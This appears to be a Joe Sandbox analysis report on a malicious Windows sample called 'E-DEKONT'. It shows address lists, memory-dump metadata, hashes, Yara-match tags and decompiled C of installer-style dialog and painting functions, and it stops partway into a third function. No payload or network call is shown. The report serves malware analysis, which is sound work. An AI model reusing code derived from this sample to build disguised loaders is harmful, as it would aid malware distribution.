                                                                            0x00406f66
                                                                            0x00406f69
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f6f
                                                                            0x00406f6f
                                                                            0x00406f72
                                                                            0x00406f79
                                                                            0x00000000
                                                                            0x00406f79
                                                                            0x00406f4e
                                                                            0x00406f51
                                                                            0x00406f58
                                                                            0x00406f5b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f81
                                                                            0x00406f81
                                                                            0x00406fa6
                                                                            0x00406fa6
                                                                            0x00406fa6
                                                                            0x00406fa8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f86
                                                                            0x00406f86
                                                                            0x00406f8a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f90
                                                                            0x00406f90
                                                                            0x00406f93
                                                                            0x00406f96
                                                                            0x00406f99
                                                                            0x00406f9b
                                                                            0x00406f9d
                                                                            0x00406fa0
                                                                            0x00406fa3
                                                                            0x00406fa3
                                                                            0x00406fa3
                                                                            0x00406faa
                                                                            0x00406fb2
                                                                            0x00406fb5
                                                                            0x00406fb8
                                                                            0x00406fba
                                                                            0x00406fbd
                                                                            0x00406fbd
                                                                            0x00406fbf
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406fc5
                                                                            0x00406fc5
                                                                            0x00406fc8
                                                                            0x00406fcd
                                                                            0x00406fcf
                                                                            0x00406fd5
                                                                            0x00406fd7
                                                                            0x00406fec
                                                                            0x00406fee
                                                                            0x00406fee
                                                                            0x00406fd9
                                                                            0x00406fdf
                                                                            0x00406fe1
                                                                            0x00406fe3
                                                                            0x00406fe3
                                                                            0x00406ff0
                                                                            0x00406ff4
                                                                            0x00406ff7
                                                                            0x00406ffd
                                                                            0x00406ffd
                                                                            0x00407000
                                                                            0x00407000
                                                                            0x00407000
                                                                            0x00407002
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407008
                                                                            0x00407008
                                                                            0x0040700e
                                                                            0x00407010
                                                                            0x00407035
                                                                            0x00407038
                                                                            0x0040703e
                                                                            0x00407043
                                                                            0x00407049
                                                                            0x0040704f
                                                                            0x00407051
                                                                            0x00407054
                                                                            0x0040705d
                                                                            0x00407063
                                                                            0x00407063
                                                                            0x00407056
                                                                            0x00407058
                                                                            0x0040705a
                                                                            0x0040705a
                                                                            0x00407065
                                                                            0x0040706b
                                                                            0x0040706d
                                                                            0x00407070
                                                                            0x00407072
                                                                            0x00407078
                                                                            0x0040707a
                                                                            0x0040707c
                                                                            0x0040707e
                                                                            0x00407080
                                                                            0x00407083
                                                                            0x0040708c
                                                                            0x0040708f
                                                                            0x0040708f
                                                                            0x00407085
                                                                            0x00407085
                                                                            0x00407088
                                                                            0x00407088
                                                                            0x00407083
                                                                            0x0040707a
                                                                            0x00407091
                                                                            0x00407093
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407093
                                                                            0x00407012
                                                                            0x00407012
                                                                            0x00407018
                                                                            0x0040701e
                                                                            0x00407020
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407022
                                                                            0x00407022
                                                                            0x00407024
                                                                            0x00407026
                                                                            0x0040702f
                                                                            0x0040702f
                                                                            0x00407028
                                                                            0x00407028
                                                                            0x0040702b
                                                                            0x0040702b
                                                                            0x00407031
                                                                            0x00407033
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407099
                                                                            0x00407099
                                                                            0x0040709e
                                                                            0x004070a0
                                                                            0x004070a1
                                                                            0x004070a2
                                                                            0x004070a3
                                                                            0x004070a9
                                                                            0x004070ac
                                                                            0x004070af
                                                                            0x004070b2
                                                                            0x004070b4
                                                                            0x004070ba
                                                                            0x004070ba
                                                                            0x004070bd
                                                                            0x004070bd
                                                                            0x004070bd
                                                                            0x004070bd
                                                                            0x004070c6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004070cb
                                                                            0x004070cb
                                                                            0x004070ce
                                                                            0x004070d1
                                                                            0x004070d3
                                                                            0x0040716a
                                                                            0x0040716a
                                                                            0x0040716d
                                                                            0x0040716f
                                                                            0x00407170
                                                                            0x00407171
                                                                            0x00407174
                                                                            0x00000000
                                                                            0x00407174
                                                                            0x004070d9
                                                                            0x004070d9
                                                                            0x004070df
                                                                            0x004070e1
                                                                            0x00407106
                                                                            0x00407109
                                                                            0x0040710f
                                                                            0x00407114
                                                                            0x0040711a
                                                                            0x00407120
                                                                            0x00407122
                                                                            0x00407125
                                                                            0x0040712e
                                                                            0x00407134
                                                                            0x00407134
                                                                            0x00407127
                                                                            0x00407129
                                                                            0x0040712b
                                                                            0x0040712b
                                                                            0x00407136
                                                                            0x0040713c
                                                                            0x0040713e
                                                                            0x00407141
                                                                            0x00407143
                                                                            0x00407149
                                                                            0x0040714b
                                                                            0x0040714d
                                                                            0x0040714f
                                                                            0x00407151
                                                                            0x00407154
                                                                            0x0040715d
                                                                            0x00407160
                                                                            0x00407160
                                                                            0x00407156
                                                                            0x00407156
                                                                            0x00407159
                                                                            0x00407159
                                                                            0x00406d3f
                                                                            0x00406d42
                                                                            0x00406d49
                                                                            0x00406d4d
                                                                            0x00406d4f
                                                                            0x00406d52
                                                                            0x00406d55
                                                                            0x00406d5a
                                                                            0x00406d5d
                                                                            0x00406d5f
                                                                            0x00406d60
                                                                            0x00406d63
                                                                            0x00406d6e
                                                                            0x00406d71
                                                                            0x00406d88
                                                                            0x00406d8d
                                                                            0x00406d94
                                                                            0x00406d99
                                                                            0x00406d9d
                                                                            0x00406d9f
                                                                            0x00406d9f
                                                                            0x00406d9f
                                                                            0x00406da2
                                                                            0x00406da4
                                                                            0x00000000
                                                                            0x00406daa
                                                                            0x00406daa
                                                                            0x00406dae
                                                                            0x00406db9
                                                                            0x00406dcc
                                                                            0x00406dd1
                                                                            0x00406dd6
                                                                            0x00406dd8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406dde
                                                                            0x00406dde
                                                                            0x00406de1
                                                                            0x00406de3
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00406df4
                                                                            0x00406df4
                                                                            0x00406df7
                                                                            0x00406dfa
                                                                            0x00406dfd
                                                                            0x00406e00
                                                                            0x00406e03
                                                                            0x00406e06
                                                                            0x00000000
                                                                            0x00406e06
                                                                            0x00406de5
                                                                            0x00406de5
                                                                            0x00406deb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406deb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040718a
                                                                            0x0040718a
                                                                            0x00407190
                                                                            0x00407196
                                                                            0x0040719b
                                                                            0x004071a1
                                                                            0x004071a7
                                                                            0x004071a9
                                                                            0x004071ac
                                                                            0x004071b5
                                                                            0x004071bb
                                                                            0x004071bb
                                                                            0x004071ae
                                                                            0x004071b0
                                                                            0x004071b2
                                                                            0x004071b2
                                                                            0x004071bd
                                                                            0x004071bf
                                                                            0x004071c2
                                                                            0x004071fd
                                                                            0x004071fd
                                                                            0x00000000
                                                                            0x004071c4
                                                                            0x004071c4
                                                                            0x004071c4
                                                                            0x004071ca
                                                                            0x004071cd
                                                                            0x004071cf
                                                                            0x00407204
                                                                            0x00407206
                                                                            0x00000000
                                                                            0x00407206
                                                                            0x00000000
                                                                            0x004071cf
                                                                            0x00000000
                                                                            0x0040680e
                                                                            0x004071dc
                                                                            0x00000000
                                                                            0x004071dc
                                                                            0x00406bf0
                                                                            0x00406bf2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406bf4
                                                                            0x00406bf4
                                                                            0x00406bf7
                                                                            0x00000000
                                                                            0x00406bf7
                                                                            0x00406b3c
                                                                            0x00406afd
                                                                            0x004071e1
                                                                            0x004071e4
                                                                            0x004071e6
                                                                            0x004071ef
                                                                            0x004071f5
                                                                            0x00000000

                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                                            • Instruction ID: c2d777d08f91faa28cc29f4af1d325e94f95b1c5ec16d27d51274fd7273dd8ba
                                                                            • Opcode Fuzzy Hash: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                                            • Instruction Fuzzy Hash: A4E18971A04709DFDB24CF59C880BAAB7F1EB44305F15852EE497AB2D1D778AA91CF04
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 73823a3969f7ed5bf644f12b40277b8c99ab435b3795f6f34b21f9b81fe81b76
                                                                            • Instruction ID: dfc852a37f472748b1ba45932cd7adc24463ba5969377bf3000a0f17d25eb075
                                                                            • Opcode Fuzzy Hash: 73823a3969f7ed5bf644f12b40277b8c99ab435b3795f6f34b21f9b81fe81b76
                                                                            • Instruction Fuzzy Hash: CF717AB50083839BD72A7A3994492F57BE79F131B4BE848AFC8C14EC4BCB2614C5C653
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8eee3bc0bff614a15713a62e9ffc46d135b4f242649d90880ff190769281bdfb
                                                                            • Instruction ID: 213a0dcb2628024174f74553963b1c82f91fd4ac8519e78d94f27425a70ba068
                                                                            • Opcode Fuzzy Hash: 8eee3bc0bff614a15713a62e9ffc46d135b4f242649d90880ff190769281bdfb
                                                                            • Instruction Fuzzy Hash: 6561A9B211C3875BD31BAA7A944A1F5BFD69F231B9BAC4CAFC4C44EC47C61250D6C292
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5ccfd20586602d5da55ab756c2bfea9a3e3c41b6dee2f3e344442fbda3be43ce
                                                                            • Instruction ID: 36be3779e98c03406928ff98cda32fa470e415bdf12767501822dc970e29882d
                                                                            • Opcode Fuzzy Hash: 5ccfd20586602d5da55ab756c2bfea9a3e3c41b6dee2f3e344442fbda3be43ce
                                                                            • Instruction Fuzzy Hash: 5651E55961C3835BD72ABE2890552F1BBC74B231B97EC88AFD8CD4E94BDA1250C8C353
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6c3db63d766609426dd1ea8412f76698c4d125557d8c94edf6470344168a5685
                                                                            • Instruction ID: b098727331e270d4924fae881777e5c555cb0e549d0e1c4ff51b321ca128dcdc
                                                                            • Opcode Fuzzy Hash: 6c3db63d766609426dd1ea8412f76698c4d125557d8c94edf6470344168a5685
                                                                            • Instruction Fuzzy Hash: 4E51E55961C3835BD72ABA2890552F1BBC74B231B97EC88EFD8CD4E94BDA1250C4C353
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dc46b4589aac2006b24e58e995c8e901668a92edc5df30213f9ac9cabdc06b97
                                                                            • Instruction ID: b892a4707adfb6d83f5993558ab6fd6001d6a87aee19bba7bff5f8c64c3a1038
                                                                            • Opcode Fuzzy Hash: dc46b4589aac2006b24e58e995c8e901668a92edc5df30213f9ac9cabdc06b97
                                                                            • Instruction Fuzzy Hash: 4B51B36611838267E72ABD2999092E57BC75FA31F5FEC896FC8C84E907C62250D8C253
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 85cc5a5b8b9e294b23f56c762ce6fd839b657d59141d191a787bbcb78bbdcd14
                                                                            • Instruction ID: be0a9486b522231ced003a0d716fd46d625f3f6955576761464d0746d35a6d3c
                                                                            • Opcode Fuzzy Hash: 85cc5a5b8b9e294b23f56c762ce6fd839b657d59141d191a787bbcb78bbdcd14
                                                                            • Instruction Fuzzy Hash: FF5115726042489BDB30AF29CE887DE77A7AF94740F56441ADC8CDB214D7354A85CB01
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3d5ae78561e76f85786e1a4e4f5ea8b1d3d697c7b93b2d9bdd6730cc44c8256d
                                                                            • Instruction ID: fdd545cf8cb56624607e985561f351dc1a26a8709c30558234340401f68a0586
                                                                            • Opcode Fuzzy Hash: 3d5ae78561e76f85786e1a4e4f5ea8b1d3d697c7b93b2d9bdd6730cc44c8256d
                                                                            • Instruction Fuzzy Hash: 0B412B687143128FDB28BE34C5E17F6A7539F52248BA881EFECCE87295DB2185C5D702
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 58c657e705f72169ec83f5c09a226d621e7c9f6b75c333912885e69e5c095c35
                                                                            • Instruction ID: 9260630fae195c7d948689cff4a6d73c900276ca20e6af330903923a7c7943b1
                                                                            • Opcode Fuzzy Hash: 58c657e705f72169ec83f5c09a226d621e7c9f6b75c333912885e69e5c095c35
                                                                            • Instruction Fuzzy Hash: ED21D0312592968FC71ACE7D98855C8BB70DF062347180AEDD9A8DF5DBD322804BCB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 91%
                                                                            			E004043B4(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                                            				intOrPtr _v8;
                                                                            				int _v12;
                                                                            				void* _v16;
                                                                            				struct HWND__* _t56;
                                                                            				signed int _t75;
                                                                            				signed short* _t76;
                                                                            				signed short* _t78;
                                                                            				long _t92;
                                                                            				int _t103;
                                                                            				signed int _t110;
                                                                            				intOrPtr _t113;
                                                                            				WCHAR* _t114;
                                                                            				signed int* _t116;
                                                                            				WCHAR* _t117;
                                                                            				struct HWND__* _t118;
                                                                            
                                                                            				if(_a8 != 0x110) {
                                                                            					if(_a8 != 0x111) {
                                                                            						L13:
                                                                            						if(_a8 != 0x4e) {
                                                                            							if(_a8 == 0x40b) {
                                                                            								 *0x42b214 =  *0x42b214 + 1;
                                                                            							}
                                                                            							L27:
                                                                            							_t114 = _a16;
                                                                            							L28:
                                                                            							return E0040427E(_a8, _a12, _t114);
                                                                            						}
                                                                            						_t56 = GetDlgItem(_a4, 0x3e8);
                                                                            						_t114 = _a16;
                                                                            						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                                            							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                                            							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                                            							_v12 = _t103;
                                                                            							_v16 = _t113;
                                                                            							_v8 = 0x432e80;
                                                                            							if(_t103 - _t113 < 0x800) {
                                                                            								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                                            								SetCursor(LoadCursorW(0, 0x7f02));
                                                                            								_push(1);
                                                                            								E00404663(_a4, _v8);
                                                                            								SetCursor(LoadCursorW(0, 0x7f00));
                                                                            								_t114 = _a16;
                                                                            							}
                                                                            						}
                                                                            						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                                            							goto L28;
                                                                            						} else {
                                                                            							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                                            								SendMessageW( *0x434ee8, 0x111, 1, 0);
                                                                            							}
                                                                            							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                                            								SendMessageW( *0x434ee8, 0x10, 0, 0);
                                                                            							}
                                                                            							return 1;
                                                                            						}
                                                                            					}
                                                                            					if(_a12 >> 0x10 != 0 ||  *0x42b214 != 0) {
                                                                            						goto L27;
                                                                            					} else {
                                                                            						_t116 =  *0x42c220 + 0x14;
                                                                            						if(( *_t116 & 0x00000020) == 0) {
                                                                            							goto L27;
                                                                            						}
                                                                            						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                            						E00404239(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                            						E0040463F();
                                                                            						goto L13;
                                                                            					}
                                                                            				}
                                                                            				_t117 = _a16;
                                                                            				_t75 =  *(_t117 + 0x30);
                                                                            				if(_t75 < 0) {
                                                                            					_t75 =  *( *0x433ebc - 4 + _t75 * 4);
                                                                            				}
                                                                            				_t76 =  *0x434f38 + _t75 * 2;
                                                                            				_t110 =  *_t76 & 0x0000ffff;
                                                                            				_a8 = _t110;
                                                                            				_t78 =  &(_t76[1]);
                                                                            				_a16 = _t78;
                                                                            				_v16 = _t78;
                                                                            				_v12 = 0;
                                                                            				_v8 = E00404365;
                                                                            				if(_t110 != 2) {
                                                                            					_v8 = E0040432B;
                                                                            				}
                                                                            				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                                            				_push(0x22);
                                                                            				E00404217(_a4);
                                                                            				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                                            				_push(0x23);
                                                                            				E00404217(_a4);
                                                                            				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                            				E00404239( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                                            				_t118 = GetDlgItem(_a4, 0x3e8);
                                                                            				E0040424C(_t118);
                                                                            				SendMessageW(_t118, 0x45b, 1, 0);
                                                                            				_t92 =  *( *0x434ef4 + 0x68);
                                                                            				if(_t92 < 0) {
                                                                            					_t92 = GetSysColor( ~_t92);
                                                                            				}
                                                                            				SendMessageW(_t118, 0x443, 0, _t92);
                                                                            				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                                            				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                                            				 *0x42b214 = 0;
                                                                            				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                                            				 *0x42b214 = 0;
                                                                            				return 0;
                                                                            			}



















                                                                            APIs
                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404452
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404466
                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404483
                                                                            • GetSysColor.USER32(?), ref: 00404494
                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A2
                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B0
                                                                            • lstrlenW.KERNEL32(?), ref: 004044B5
                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C2
                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044D7
                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00404530
                                                                            • SendMessageW.USER32(00000000), ref: 00404537
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404562
                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045A5
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004045B3
                                                                            • SetCursor.USER32(00000000), ref: 004045B6
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004045CF
                                                                            • SetCursor.USER32(00000000), ref: 004045D2
                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404601
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404613
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                            • String ID: +C@$Call$N
                                                                            • API String ID: 3103080414-3697844480
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 90%
                                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                            				struct tagLOGBRUSH _v16;
                                                                            				struct tagRECT _v32;
                                                                            				struct tagPAINTSTRUCT _v96;
                                                                            				struct HDC__* _t70;
                                                                            				struct HBRUSH__* _t87;
                                                                            				struct HFONT__* _t94;
                                                                            				long _t102;
                                                                            				signed int _t126;
                                                                            				struct HDC__* _t128;
                                                                            				intOrPtr _t130;
                                                                            
                                                                            				if(_a8 == 0xf) {
                                                                            					_t130 =  *0x434ef4;
                                                                            					_t70 = BeginPaint(_a4,  &_v96);
                                                                            					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                            					_a8 = _t70;
                                                                            					GetClientRect(_a4,  &_v32);
                                                                            					_t126 = _v32.bottom;
                                                                            					_v32.bottom = _v32.bottom & 0x00000000;
                                                                            					while(_v32.top < _t126) {
                                                                            						_a12 = _t126 - _v32.top;
                                                                            						asm("cdq");
                                                                            						asm("cdq");
                                                                            						asm("cdq");
                                                                            						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                            						_t87 = CreateBrushIndirect( &_v16);
                                                                            						_v32.bottom = _v32.bottom + 4;
                                                                            						_a16 = _t87;
                                                                            						FillRect(_a8,  &_v32, _t87);
                                                                            						DeleteObject(_a16);
                                                                            						_v32.top = _v32.top + 4;
                                                                            					}
                                                                            					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                            						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                                            						_a16 = _t94;
                                                                            						if(_t94 != 0) {
                                                                            							_t128 = _a8;
                                                                            							_v32.left = 0x10;
                                                                            							_v32.top = 8;
                                                                            							SetBkMode(_t128, 1);
                                                                            							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                            							_a8 = SelectObject(_t128, _a16);
                                                                            							DrawTextW(_t128, 0x433ee0, 0xffffffff,  &_v32, 0x820);
                                                                            							SelectObject(_t128, _a8);
                                                                            							DeleteObject(_a16);
                                                                            						}
                                                                            					}
                                                                            					EndPaint(_a4,  &_v96);
                                                                            					return 0;
                                                                            				}
                                                                            				_t102 = _a16;
                                                                            				if(_a8 == 0x46) {
                                                                            					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                            					 *((intOrPtr*)(_t102 + 4)) =  *0x434ee8;
                                                                            				}
                                                                            				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                                            			}














                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                            • DrawTextW.USER32(00000000,00433EE0,000000FF,00000010,00000820), ref: 00401156
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                            • String ID: F
                                                                            • API String ID: 941294808-1304234792
                                                                            • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                            • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                                            • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                            • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00405ECE(void* __ecx) {
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				long _t12;
                                                                            				long _t24;
                                                                            				char* _t31;
                                                                            				int _t37;
                                                                            				void* _t38;
                                                                            				intOrPtr* _t39;
                                                                            				long _t42;
                                                                            				WCHAR* _t44;
                                                                            				void* _t46;
                                                                            				void* _t48;
                                                                            				void* _t49;
                                                                            				void* _t52;
                                                                            				void* _t53;
                                                                            
                                                                            				_t38 = __ecx;
                                                                            				_t44 =  *(_t52 + 0x14);
